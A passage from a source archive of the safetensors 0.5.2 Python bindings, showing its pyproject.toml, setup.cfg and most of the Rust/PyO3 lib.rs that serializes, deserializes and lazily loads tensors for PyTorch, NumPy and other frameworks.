More information at https://huggingface.co/docs/safetensors/torch_shared_tensors """ ) return { k: { "dtype": str(v.dtype).split(".")[-1], "shape": v.shape, "data": _tobytes(v, k), } for k, v in tensors.items() } safetensors-0.5.2/bindings/python/pyproject.toml000066400000000000000000000045631473753372300221320ustar00rootroot00000000000000[project] name = 'safetensors' requires-python = '>=3.7' authors = [ {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'} ] classifiers = [ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers", "Intended Audience :: Education", "Intended Audience :: Science/Research", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Topic :: Scientific/Engineering :: Artificial Intelligence", "Typing :: Typed", ] dynamic = [ 'description', 'license', 'readme', 'version', ] [project.urls] Homepage = 'https://github.com/huggingface/safetensors' Source = 'https://github.com/huggingface/safetensors' [project.optional-dependencies] numpy = ["numpy>=1.21.6"] torch = [ "safetensors[numpy]", "torch>=1.10", ] tensorflow = [ "safetensors[numpy]", "tensorflow>=2.11.0", ] # pinning tf version 2.11.0 for doc-builder pinned-tf = [ "safetensors[numpy]", "tensorflow==2.18.0", ] jax = [ "safetensors[numpy]", "flax>=0.6.3", "jax>=0.3.25", "jaxlib>=0.3.25", ] mlx = [ "mlx>=0.0.9", ] paddlepaddle = [ "safetensors[numpy]", "paddlepaddle>=2.4.1", ] quality = [ "black==22.3", # after updating to black 2023, also update Python version in pyproject.toml to 3.7 "click==8.0.4", "isort>=5.5.4", "flake8>=3.8.3", ] testing = [ "safetensors[numpy]", "h5py>=3.7.0", "huggingface_hub>=0.12.1", "setuptools_rust>=1.5.2", "pytest>=7.2.0", "pytest-benchmark>=4.0.0", # "python-afl>=0.7.3", "hypothesis>=6.70.2", ] all = [ "safetensors[torch]", "safetensors[numpy]", "safetensors[pinned-tf]", "safetensors[jax]", "safetensors[paddlepaddle]", "safetensors[quality]", "safetensors[testing]", ] dev = [ "safetensors[all]", ] [build-system] requires = ["maturin>=1.0,<2.0"] build-backend = "maturin" [tool.maturin] python-source = "py_src" module-name = "safetensors._safetensors_rust" bindings = 'pyo3' features = ["pyo3/extension-module"] [tool.black] line-length = 119 target-version = ['py35'] [tool.setuptools.dynamic] readme = {file = ["README.rst"]} safetensors-0.5.2/bindings/python/setup.cfg000066400000000000000000000015731473753372300210350ustar00rootroot00000000000000[isort] default_section = FIRSTPARTY ensure_newline_before_comments = True force_grid_wrap = 0 include_trailing_comma = True known_first_party = transformers known_third_party = absl conllu datasets elasticsearch fairseq faiss-cpu fastprogress fire fugashi git h5py matplotlib nltk numpy packaging pandas PIL psutil pytest pytorch_lightning rouge_score sacrebleu seqeval sklearn streamlit tensorboardX tensorflow tensorflow_datasets timeout_decorator torch torchaudio torchtext torchvision torch_xla tqdm paddlepaddle line_length = 119 lines_after_imports = 2 multi_line_output = 3 use_parentheses = True [flake8] ignore = E203, E501, E741, W503, W605 max-line-length = 119 [tool:pytest] doctest_optionflags=NUMBER NORMALIZE_WHITESPACE 
ELLIPSISsafetensors-0.5.2/bindings/python/src/000077500000000000000000000000001473753372300177755ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/src/lib.rs000066400000000000000000001273331473753372300211220ustar00rootroot00000000000000#![deny(missing_docs)] //! Dummy doc use memmap2::{Mmap, MmapOptions}; use pyo3::exceptions::{PyException, PyFileNotFoundError}; use pyo3::prelude::*; use pyo3::sync::GILOnceCell; use pyo3::types::IntoPyDict; use pyo3::types::{PyBool, PyByteArray, PyBytes, PyDict, PyList, PySlice}; use pyo3::Bound as PyBound; use pyo3::{intern, PyErr}; use safetensors::slice::TensorIndexer; use safetensors::tensor::{Dtype, Metadata, SafeTensors, TensorInfo, TensorView}; use safetensors::View; use std::borrow::Cow; use std::collections::HashMap; use std::fs::File; use std::iter::FromIterator; use std::ops::Bound; use std::path::PathBuf; use std::sync::Arc; static TORCH_MODULE: GILOnceCell> = GILOnceCell::new(); static NUMPY_MODULE: GILOnceCell> = GILOnceCell::new(); static TENSORFLOW_MODULE: GILOnceCell> = GILOnceCell::new(); static FLAX_MODULE: GILOnceCell> = GILOnceCell::new(); static MLX_MODULE: GILOnceCell> = GILOnceCell::new(); struct PyView<'a> { shape: Vec, dtype: Dtype, data: PyBound<'a, PyBytes>, data_len: usize, } impl View for &PyView<'_> { fn data(&self) -> std::borrow::Cow<[u8]> { Cow::Borrowed(self.data.as_bytes()) } fn shape(&self) -> &[usize] { &self.shape } fn dtype(&self) -> Dtype { self.dtype } fn data_len(&self) -> usize { self.data_len } } fn prepare(tensor_dict: HashMap>) -> PyResult> { let mut tensors = HashMap::with_capacity(tensor_dict.len()); for (tensor_name, tensor_desc) in &tensor_dict { let shape: Vec = tensor_desc .get_item("shape")? .ok_or_else(|| SafetensorError::new_err(format!("Missing `shape` in {tensor_desc:?}")))? .extract()?; let pydata: PyBound = tensor_desc.get_item("data")?.ok_or_else(|| { SafetensorError::new_err(format!("Missing `data` in {tensor_desc:?}")) })?; // Make sure it's extractable first. let data: &[u8] = pydata.extract()?; let data_len = data.len(); let data: PyBound = pydata.extract()?; let pydtype = tensor_desc.get_item("dtype")?.ok_or_else(|| { SafetensorError::new_err(format!("Missing `dtype` in {tensor_desc:?}")) })?; let dtype: String = pydtype.extract()?; let dtype = match dtype.as_ref() { "bool" => Dtype::BOOL, "int8" => Dtype::I8, "uint8" => Dtype::U8, "int16" => Dtype::I16, "uint16" => Dtype::U16, "int32" => Dtype::I32, "uint32" => Dtype::U32, "int64" => Dtype::I64, "uint64" => Dtype::U64, "float16" => Dtype::F16, "float32" => Dtype::F32, "float64" => Dtype::F64, "bfloat16" => Dtype::BF16, "float8_e4m3fn" => Dtype::F8_E4M3, "float8_e5m2" => Dtype::F8_E5M2, dtype_str => { return Err(SafetensorError::new_err(format!( "dtype {dtype_str} is not covered", ))); } }; let tensor = PyView { shape, dtype, data, data_len, }; tensors.insert(tensor_name.to_string(), tensor); } Ok(tensors) } /// Serializes raw data. /// /// Args: /// tensor_dict (`Dict[str, Dict[Any]]`): /// The tensor dict is like: /// {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} /// metadata (`Dict[str, str]`, *optional*): /// The optional purely text annotations /// /// Returns: /// (`bytes`): /// The serialized content. 
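// `prepare` above converts the Python-side dict (using numpy-style dtype names such as
// "float32" or "bfloat16", i.e. `np.dtype.name` strings) into `PyView`s before handing
// them to the core `safetensors::tensor::serialize`.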
#[pyfunction] #[pyo3(signature = (tensor_dict, metadata=None))] fn serialize<'b>( py: Python<'b>, tensor_dict: HashMap>, metadata: Option>, ) -> PyResult> { let tensors = prepare(tensor_dict)?; let metadata_map = metadata.map(HashMap::from_iter); let out = safetensors::tensor::serialize(&tensors, &metadata_map) .map_err(|e| SafetensorError::new_err(format!("Error while serializing: {e:?}")))?; let pybytes = PyBytes::new(py, &out); Ok(pybytes) } /// Serializes raw data. /// /// Args: /// tensor_dict (`Dict[str, Dict[Any]]`): /// The tensor dict is like: /// {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} /// filename (`str`, or `os.PathLike`): /// The name of the file to write into. /// metadata (`Dict[str, str]`, *optional*): /// The optional purely text annotations /// /// Returns: /// (`bytes`): /// The serialized content. #[pyfunction] #[pyo3(signature = (tensor_dict, filename, metadata=None))] fn serialize_file( tensor_dict: HashMap>, filename: PathBuf, metadata: Option>, ) -> PyResult<()> { let tensors = prepare(tensor_dict)?; safetensors::tensor::serialize_to_file(&tensors, &metadata, filename.as_path()) .map_err(|e| SafetensorError::new_err(format!("Error while serializing: {e:?}")))?; Ok(()) } /// Opens a safetensors lazily and returns tensors as asked /// /// Args: /// data (`bytes`): /// The byte content of a file /// /// Returns: /// (`List[str, Dict[str, Dict[str, any]]]`): /// The deserialized content is like: /// [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)] #[pyfunction] #[pyo3(signature = (bytes))] fn deserialize(py: Python, bytes: &[u8]) -> PyResult)>> { let safetensor = SafeTensors::deserialize(bytes) .map_err(|e| SafetensorError::new_err(format!("Error while deserializing: {e:?}")))?; let tensors = safetensor.tensors(); let mut items = Vec::with_capacity(tensors.len()); for (tensor_name, tensor) in tensors { let pyshape: PyObject = PyList::new(py, tensor.shape().iter())?.into(); let pydtype: PyObject = format!("{:?}", tensor.dtype()).into_pyobject(py)?.into(); let pydata: PyObject = PyByteArray::new(py, tensor.data()).into(); let map = HashMap::from([ ("shape".to_string(), pyshape), ("dtype".to_string(), pydtype), ("data".to_string(), pydata), ]); items.push((tensor_name, map)); } Ok(items) } fn slice_to_indexer( (dim_idx, (slice_index, dim)): (usize, (SliceIndex, usize)), ) -> Result { match slice_index { SliceIndex::Slice(slice) => { let py_start = slice.getattr(intern!(slice.py(), "start"))?; let start: Option = py_start.extract()?; let start = if let Some(start) = start { Bound::Included(start) } else { Bound::Unbounded }; let py_stop = slice.getattr(intern!(slice.py(), "stop"))?; let stop: Option = py_stop.extract()?; let stop = if let Some(stop) = stop { Bound::Excluded(stop) } else { Bound::Unbounded }; Ok(TensorIndexer::Narrow(start, stop)) } SliceIndex::Index(idx) => { if idx < 0 { let idx = dim .checked_add_signed(idx as isize) .ok_or(SafetensorError::new_err(format!( "Invalid index {idx} for dimension {dim_idx} of size {dim}" )))?; Ok(TensorIndexer::Select(idx)) } else { Ok(TensorIndexer::Select(idx as usize)) } } } } #[derive(Debug, Clone, PartialEq, Eq)] enum Framework { Pytorch, Numpy, Tensorflow, Flax, Mlx, } impl<'source> FromPyObject<'source> for Framework { fn extract_bound(ob: &PyBound<'source, PyAny>) -> PyResult { let name: String = ob.extract()?; match &name[..] 
{ "pt" => Ok(Framework::Pytorch), "torch" => Ok(Framework::Pytorch), "pytorch" => Ok(Framework::Pytorch), "np" => Ok(Framework::Numpy), "numpy" => Ok(Framework::Numpy), "tf" => Ok(Framework::Tensorflow), "tensorflow" => Ok(Framework::Tensorflow), "jax" => Ok(Framework::Flax), "flax" => Ok(Framework::Flax), "mlx" => Ok(Framework::Mlx), name => Err(SafetensorError::new_err(format!( "framework {name} is invalid" ))), } } } #[derive(Debug, Clone, PartialEq, Eq)] enum Device { Cpu, Cuda(usize), Mps, Npu(usize), Xpu(usize), Xla(usize), Mlu(usize), /// User didn't specify acceletor, torch /// is responsible for choosing. Anonymous(usize), } /// Parsing the device index. fn parse_device(name: &str) -> PyResult { let tokens: Vec<_> = name.split(':').collect(); if tokens.len() == 2 { let device: usize = tokens[1].parse()?; Ok(device) } else { Err(SafetensorError::new_err(format!( "device {name} is invalid" ))) } } impl<'source> FromPyObject<'source> for Device { fn extract_bound(ob: &PyBound<'source, PyAny>) -> PyResult { if let Ok(name) = ob.extract::() { match &name[..] { "cpu" => Ok(Device::Cpu), "cuda" => Ok(Device::Cuda(0)), "mps" => Ok(Device::Mps), "npu" => Ok(Device::Npu(0)), "xpu" => Ok(Device::Xpu(0)), "xla" => Ok(Device::Xla(0)), "mlu" => Ok(Device::Mlu(0)), name if name.starts_with("cuda:") => parse_device(name).map(Device::Cuda), name if name.starts_with("npu:") => parse_device(name).map(Device::Npu), name if name.starts_with("xpu:") => parse_device(name).map(Device::Xpu), name if name.starts_with("xla:") => parse_device(name).map(Device::Xla), name if name.starts_with("mlu:") => parse_device(name).map(Device::Mlu), name => Err(SafetensorError::new_err(format!( "device {name} is invalid" ))), } } else if let Ok(number) = ob.extract::() { Ok(Device::Anonymous(number)) } else { Err(SafetensorError::new_err(format!("device {ob} is invalid"))) } } } impl<'py> IntoPyObject<'py> for Device { type Target = PyAny; type Output = pyo3::Bound<'py, Self::Target>; type Error = std::convert::Infallible; fn into_pyobject(self, py: Python<'py>) -> Result { match self { Device::Cpu => "cpu".into_pyobject(py).map(|x| x.into_any()), Device::Cuda(n) => format!("cuda:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Mps => "mps".into_pyobject(py).map(|x| x.into_any()), Device::Npu(n) => format!("npu:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Xpu(n) => format!("xpu:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Xla(n) => format!("xla:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Mlu(n) => format!("mlu:{n}").into_pyobject(py).map(|x| x.into_any()), Device::Anonymous(n) => n.into_pyobject(py).map(|x| x.into_any()), } } } enum Storage { Mmap(Mmap), /// Torch specific mmap /// This allows us to not manage it /// so Pytorch can handle the whole lifecycle. /// https://pytorch.org/docs/stable/storage.html#torch.TypedStorage.from_file. 
TorchStorage(GILOnceCell), } #[derive(Debug, PartialEq, Eq, PartialOrd)] struct Version { major: u8, minor: u8, patch: u8, } impl Version { fn new(major: u8, minor: u8, patch: u8) -> Self { Self { major, minor, patch, } } fn from_string(string: &str) -> Result { let mut parts = string.split('.'); let err = || format!("Could not parse torch package version {string}."); let major_str = parts.next().ok_or_else(err)?; let minor_str = parts.next().ok_or_else(err)?; let patch_str = parts.next().ok_or_else(err)?; // Patch is more complex and can be: // - `1` a number // - `1a0`, `1b0`, `1rc1` an alpha, beta, release candidate version // - `1a0+git2323` from source with commit number let patch_str: String = patch_str .chars() .take_while(|c| c.is_ascii_digit()) .collect(); let major = major_str.parse().map_err(|_| err())?; let minor = minor_str.parse().map_err(|_| err())?; let patch = patch_str.parse().map_err(|_| err())?; Ok(Version { major, minor, patch, }) } } struct Open { metadata: Metadata, offset: usize, framework: Framework, device: Device, storage: Arc, } impl Open { fn new(filename: PathBuf, framework: Framework, device: Option) -> PyResult { let file = File::open(&filename).map_err(|_| { PyFileNotFoundError::new_err(format!("No such file or directory: {filename:?}")) })?; let device = device.unwrap_or(Device::Cpu); if device != Device::Cpu && framework != Framework::Pytorch { return Err(SafetensorError::new_err(format!( "Device {device:?} is not support for framework {framework:?}", ))); } // SAFETY: Mmap is used to prevent allocating in Rust // before making a copy within Python. let buffer = unsafe { MmapOptions::new().map_copy_read_only(&file)? }; let (n, metadata) = SafeTensors::read_metadata(&buffer).map_err(|e| { SafetensorError::new_err(format!("Error while deserializing header: {e:?}")) })?; let offset = n + 8; Python::with_gil(|py| -> PyResult<()> { match framework { Framework::Pytorch => { let module = PyModule::import(py, intern!(py, "torch"))?; TORCH_MODULE.get_or_init(py, || module.into()) } _ => { let module = PyModule::import(py, intern!(py, "numpy"))?; NUMPY_MODULE.get_or_init(py, || module.into()) } }; Ok(()) })?; let storage = match &framework { Framework::Pytorch => Python::with_gil(|py| -> PyResult { let module = get_module(py, &TORCH_MODULE)?; let version: String = module.getattr(intern!(py, "__version__"))?.extract()?; let version = Version::from_string(&version).map_err(SafetensorError::new_err)?; // Untyped storage only exists for versions over 1.11.0 // Same for torch.asarray which is necessary for zero-copy tensor if version >= Version::new(1, 11, 0) { // storage = torch.ByteStorage.from_file(filename, shared=False, size=size).untyped() let py_filename: PyObject = filename.into_pyobject(py)?.into(); let size: PyObject = buffer.len().into_pyobject(py)?.into(); let shared: PyObject = PyBool::new(py, false).to_owned().into(); let (size_name, storage_name) = if version >= Version::new(2, 0, 0) { (intern!(py, "nbytes"), intern!(py, "UntypedStorage")) } else { (intern!(py, "size"), intern!(py, "ByteStorage")) }; let kwargs = [(intern!(py, "shared"), shared), (size_name, size)].into_py_dict(py)?; let storage = module .getattr(storage_name)? // .getattr(intern!(py, "from_file"))? 
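// Letting torch own the file mapping (rather than our Rust `Mmap`) means Python manages
// the storage's lifetime, so tensors created from it stay valid without extra bookkeeping.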
.call_method("from_file", (py_filename,), Some(&kwargs))?; let untyped: PyBound<'_, PyAny> = match storage.getattr(intern!(py, "untyped")) { Ok(untyped) => untyped, Err(_) => storage.getattr(intern!(py, "_untyped"))?, }; let storage = untyped.call0()?.into_pyobject(py)?.into(); let gil_storage = GILOnceCell::new(); gil_storage.get_or_init(py, || storage); Ok(Storage::TorchStorage(gil_storage)) } else { Ok(Storage::Mmap(buffer)) } })?, _ => Storage::Mmap(buffer), }; let storage = Arc::new(storage); Ok(Self { metadata, offset, framework, device, storage, }) } /// Return the special non tensor information in the header /// /// Returns: /// (`Dict[str, str]`): /// The freeform metadata. pub fn metadata(&self) -> Option> { self.metadata.metadata().clone() } /// Returns the names of the tensors in the file. /// /// Returns: /// (`List[str]`): /// The name of the tensors contained in that file pub fn keys(&self) -> PyResult> { let mut keys: Vec = self.metadata.tensors().keys().cloned().collect(); keys.sort(); Ok(keys) } /// Returns a full tensor /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`Tensor`): /// The tensor in the framework you opened the file for. /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor = f.get_tensor("embedding") /// /// ``` pub fn get_tensor(&self, name: &str) -> PyResult { let info = self.metadata.info(name).ok_or_else(|| { SafetensorError::new_err(format!("File does not contain tensor {name}",)) })?; // let info = tensors.get(name).ok_or_else(|| { // SafetensorError::new_err(format!("File does not contain tensor {name}",)) // })?; match &self.storage.as_ref() { Storage::Mmap(mmap) => { let data = &mmap[info.data_offsets.0 + self.offset..info.data_offsets.1 + self.offset]; let array: PyObject = Python::with_gil(|py| PyByteArray::new(py, data).into_any().into()); create_tensor( &self.framework, info.dtype, &info.shape, array, &self.device, ) } Storage::TorchStorage(storage) => { Python::with_gil(|py| -> PyResult { let torch = get_module(py, &TORCH_MODULE)?; let dtype: PyObject = get_pydtype(torch, info.dtype, false)?; let torch_uint8: PyObject = get_pydtype(torch, Dtype::U8, false)?; let kwargs = [(intern!(py, "dtype"), torch_uint8)].into_py_dict(py)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; let shape = info.shape.to_vec(); let shape: PyObject = shape.into_pyobject(py)?.into(); let start = (info.data_offsets.0 + self.offset) as isize; let stop = (info.data_offsets.1 + self.offset) as isize; let slice = PySlice::new(py, start, stop, 1); let storage: &PyObject = storage .get(py) .ok_or_else(|| SafetensorError::new_err("Could not find storage"))?; let storage: &PyBound = storage.bind(py); let storage_slice = storage .getattr(intern!(py, "__getitem__"))? .call1((slice,))?; let sys = PyModule::import(py, intern!(py, "sys"))?; let byteorder: String = sys.getattr(intern!(py, "byteorder"))?.extract()?; let mut tensor = torch .getattr(intern!(py, "asarray"))? .call((storage_slice,), Some(&kwargs))? .getattr(intern!(py, "view"))? 
.call((), Some(&view_kwargs))?; if byteorder == "big" { let inplace_kwargs = [(intern!(py, "inplace"), PyBool::new(py, false))].into_py_dict(py)?; let intermediary_dtype = match info.dtype { Dtype::BF16 => Some(Dtype::F16), Dtype::F8_E5M2 => Some(Dtype::U8), Dtype::F8_E4M3 => Some(Dtype::U8), _ => None, }; if let Some(intermediary_dtype) = intermediary_dtype { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, intermediary_dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } let numpy = tensor .getattr(intern!(py, "numpy"))? .call0()? .getattr("byteswap")? .call((), Some(&inplace_kwargs))?; tensor = torch.getattr(intern!(py, "from_numpy"))?.call1((numpy,))?; if intermediary_dtype.is_some() { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, info.dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } } tensor = tensor.getattr(intern!(py, "reshape"))?.call1((shape,))?; if self.device != Device::Cpu { let device: PyObject = self.device.clone().into_pyobject(py)?.into(); let kwargs = PyDict::new(py); tensor = tensor.call_method("to", (device,), Some(&kwargs))?; } Ok(tensor.into_pyobject(py)?.into()) // torch.asarray(storage[start + n : stop + n], dtype=torch.uint8).view(dtype=dtype).reshape(shape) }) } } } /// Returns a full slice view object /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`PySafeSlice`): /// A dummy object you can slice into to get a real tensor /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor_part = f.get_slice("embedding")[:, ::8] /// /// ``` pub fn get_slice(&self, name: &str) -> PyResult { if let Some(&info) = self.metadata.tensors().get(name) { Ok(PySafeSlice { info: info.clone(), framework: self.framework.clone(), offset: self.offset, device: self.device.clone(), storage: self.storage.clone(), }) } else { Err(SafetensorError::new_err(format!( "File does not contain tensor {name}", ))) } } } /// Opens a safetensors lazily and returns tensors as asked /// /// Args: /// filename (`str`, or `os.PathLike`): /// The filename to open /// /// framework (`str`): /// The framework you want you tensors in. Supported values: /// `pt`, `tf`, `flax`, `numpy`. /// /// device (`str`, defaults to `"cpu"`): /// The device on which you want the tensors. #[pyclass] #[allow(non_camel_case_types)] struct safe_open { inner: Option, } impl safe_open { fn inner(&self) -> PyResult<&Open> { let inner = self .inner .as_ref() .ok_or_else(|| SafetensorError::new_err("File is closed".to_string()))?; Ok(inner) } } #[pymethods] impl safe_open { #[new] #[pyo3(signature = (filename, framework, device=Some(Device::Cpu)))] fn new(filename: PathBuf, framework: Framework, device: Option) -> PyResult { let inner = Some(Open::new(filename, framework, device)?); Ok(Self { inner }) } /// Return the special non tensor information in the header /// /// Returns: /// (`Dict[str, str]`): /// The freeform metadata. pub fn metadata(&self) -> PyResult>> { Ok(self.inner()?.metadata()) } /// Returns the names of the tensors in the file. 
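/// The returned names are sorted.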
/// /// Returns: /// (`List[str]`): /// The name of the tensors contained in that file pub fn keys(&self) -> PyResult> { self.inner()?.keys() } /// Returns a full tensor /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`Tensor`): /// The tensor in the framework you opened the file for. /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor = f.get_tensor("embedding") /// /// ``` pub fn get_tensor(&self, name: &str) -> PyResult { self.inner()?.get_tensor(name) } /// Returns a full slice view object /// /// Args: /// name (`str`): /// The name of the tensor you want /// /// Returns: /// (`PySafeSlice`): /// A dummy object you can slice into to get a real tensor /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tensor_part = f.get_slice("embedding")[:, ::8] /// /// ``` pub fn get_slice(&self, name: &str) -> PyResult { self.inner()?.get_slice(name) } /// Start the context manager pub fn __enter__(slf: Py) -> Py { slf } /// Exits the context manager pub fn __exit__(&mut self, _exc_type: PyObject, _exc_value: PyObject, _traceback: PyObject) { self.inner = None; } } #[pyclass] struct PySafeSlice { info: TensorInfo, framework: Framework, offset: usize, device: Device, storage: Arc, } #[derive(FromPyObject)] enum SliceIndex<'a> { Slice(PyBound<'a, PySlice>), Index(i32), } #[derive(FromPyObject)] enum Slice<'a> { Slice(SliceIndex<'a>), Slices(Vec>), } use std::fmt; struct Disp(Vec); /// Should be more readable that the standard /// `Debug` impl fmt::Display for Disp { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "[")?; for item in &self.0 { write!(f, "{item}")?; } write!(f, "]") } } #[pymethods] impl PySafeSlice { /// Returns the shape of the full underlying tensor /// /// Returns: /// (`List[int]`): /// The shape of the full tensor /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tslice = f.get_slice("embedding") /// shape = tslice.get_shape() /// dim = shape // 8 /// tensor = tslice[:, :dim] /// ``` pub fn get_shape(&self, py: Python) -> PyResult { let shape = self.info.shape.clone(); let shape: PyObject = shape.into_pyobject(py)?.into(); Ok(shape) } /// Returns the dtype of the full underlying tensor /// /// Returns: /// (`str`): /// The dtype of the full tensor /// /// Example: /// ```python /// from safetensors import safe_open /// /// with safe_open("model.safetensors", framework="pt", device=0) as f: /// tslice = f.get_slice("embedding") /// dtype = tslice.get_dtype() # "F32" /// ``` pub fn get_dtype(&self, py: Python) -> PyResult { let dtype = self.info.dtype; let dtype: PyObject = format!("{:?}", dtype).into_pyobject(py)?.into(); Ok(dtype) } pub fn __getitem__(&self, slices: &PyBound<'_, PyAny>) -> PyResult { match &self.storage.as_ref() { Storage::Mmap(mmap) => { let pyslices = slices; let slices: Slice = pyslices.extract()?; let is_list = pyslices.is_instance_of::(); let slices: Vec = match slices { Slice::Slice(slice) => vec![slice], Slice::Slices(slices) => { if slices.is_empty() && is_list { vec![SliceIndex::Slice(PySlice::new(pyslices.py(), 0, 0, 0))] } else if is_list { return Err(SafetensorError::new_err( "Non empty lists are not implemented", )); } else { slices } } }; let data = &mmap[self.info.data_offsets.0 + self.offset 
..self.info.data_offsets.1 + self.offset]; let shape = self.info.shape.clone(); let tensor = TensorView::new(self.info.dtype, self.info.shape.clone(), data) .map_err(|e| { SafetensorError::new_err(format!("Error preparing tensor view: {e:?}")) })?; let slices: Vec = slices .into_iter() .zip(shape) .enumerate() .map(slice_to_indexer) .collect::>()?; let iterator = tensor.sliced_data(&slices).map_err(|e| { SafetensorError::new_err(format!( "Error during slicing {} with shape {:?}: {:?}", Disp(slices), self.info.shape, e )) })?; let newshape = iterator.newshape(); let mut offset = 0; let length = iterator.remaining_byte_len(); Python::with_gil(|py| { let array: PyObject = PyByteArray::new_with(py, length, |bytes: &mut [u8]| { for slice in iterator { let len = slice.len(); bytes[offset..offset + slice.len()].copy_from_slice(slice); offset += len; } Ok(()) })? .into_any() .into(); create_tensor( &self.framework, self.info.dtype, &newshape, array, &self.device, ) }) } Storage::TorchStorage(storage) => Python::with_gil(|py| -> PyResult { let torch = get_module(py, &TORCH_MODULE)?; let dtype: PyObject = get_pydtype(torch, self.info.dtype, false)?; let torch_uint8: PyObject = get_pydtype(torch, Dtype::U8, false)?; let kwargs = [(intern!(py, "dtype"), torch_uint8)].into_py_dict(py)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; let shape = self.info.shape.to_vec(); let shape: PyObject = shape.into_pyobject(py)?.into(); let start = (self.info.data_offsets.0 + self.offset) as isize; let stop = (self.info.data_offsets.1 + self.offset) as isize; let slice = PySlice::new(py, start, stop, 1); let storage: &PyObject = storage .get(py) .ok_or_else(|| SafetensorError::new_err("Could not find storage"))?; let storage: &PyBound<'_, PyAny> = storage.bind(py); let storage_slice = storage .getattr(intern!(py, "__getitem__"))? .call1((slice,))?; let slices = slices.into_pyobject(py)?; let sys = PyModule::import(py, intern!(py, "sys"))?; let byteorder: String = sys.getattr(intern!(py, "byteorder"))?.extract()?; let mut tensor = torch .getattr(intern!(py, "asarray"))? .call((storage_slice,), Some(&kwargs))? .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; if byteorder == "big" { // Important, do NOT use inplace otherwise the slice itself // is byteswapped, meaning multiple calls will fails let inplace_kwargs = [(intern!(py, "inplace"), PyBool::new(py, false))].into_py_dict(py)?; let intermediary_dtype = match self.info.dtype { Dtype::BF16 => Some(Dtype::F16), Dtype::F8_E5M2 => Some(Dtype::U8), Dtype::F8_E4M3 => Some(Dtype::U8), _ => None, }; if let Some(intermediary_dtype) = intermediary_dtype { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, intermediary_dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } let numpy = tensor .getattr(intern!(py, "numpy"))? .call0()? .getattr("byteswap")? .call((), Some(&inplace_kwargs))?; tensor = torch.getattr(intern!(py, "from_numpy"))?.call1((numpy,))?; if intermediary_dtype.is_some() { // Reinterpret to f16 for numpy compatibility. let dtype: PyObject = get_pydtype(torch, self.info.dtype, false)?; let view_kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; tensor = tensor .getattr(intern!(py, "view"))? .call((), Some(&view_kwargs))?; } } tensor = tensor .getattr(intern!(py, "reshape"))? .call1((shape,))? .getattr(intern!(py, "__getitem__"))? 
.call1((slices,))?; if self.device != Device::Cpu { let device: PyObject = self.device.clone().into_pyobject(py)?.into(); let kwargs = PyDict::new(py); tensor = tensor.call_method("to", (device,), Some(&kwargs))?; } Ok(tensor.into()) }), } } } fn get_module<'a>( py: Python<'a>, cell: &'static GILOnceCell>, ) -> PyResult<&'a PyBound<'a, PyModule>> { let module: &PyBound<'a, PyModule> = cell .get(py) .ok_or_else(|| SafetensorError::new_err("Could not find module"))? .bind(py); Ok(module) } fn create_tensor<'a>( framework: &'a Framework, dtype: Dtype, shape: &'a [usize], array: PyObject, device: &'a Device, ) -> PyResult { Python::with_gil(|py| -> PyResult { let (module, is_numpy): (&PyBound<'_, PyModule>, bool) = match framework { Framework::Pytorch => ( TORCH_MODULE .get(py) .ok_or_else(|| { SafetensorError::new_err(format!("Could not find module {framework:?}",)) })? .bind(py), false, ), _ => ( NUMPY_MODULE .get(py) .ok_or_else(|| { SafetensorError::new_err(format!("Could not find module {framework:?}",)) })? .bind(py), true, ), }; let dtype: PyObject = get_pydtype(module, dtype, is_numpy)?; let count: usize = shape.iter().product(); let shape = shape.to_vec(); let tensor = if count == 0 { // Torch==1.10 does not allow frombuffer on empty buffers so we create // the tensor manually. // let zeros = module.getattr(intern!(py, "zeros"))?; let shape: PyObject = shape.clone().into_pyobject(py)?.into(); let args = (shape,); let kwargs = [(intern!(py, "dtype"), dtype)].into_py_dict(py)?; module.call_method("zeros", args, Some(&kwargs))? } else { // let frombuffer = module.getattr(intern!(py, "frombuffer"))?; let kwargs = [ (intern!(py, "buffer"), array), (intern!(py, "dtype"), dtype), ] .into_py_dict(py)?; let mut tensor = module.call_method("frombuffer", (), Some(&kwargs))?; let sys = PyModule::import(py, intern!(py, 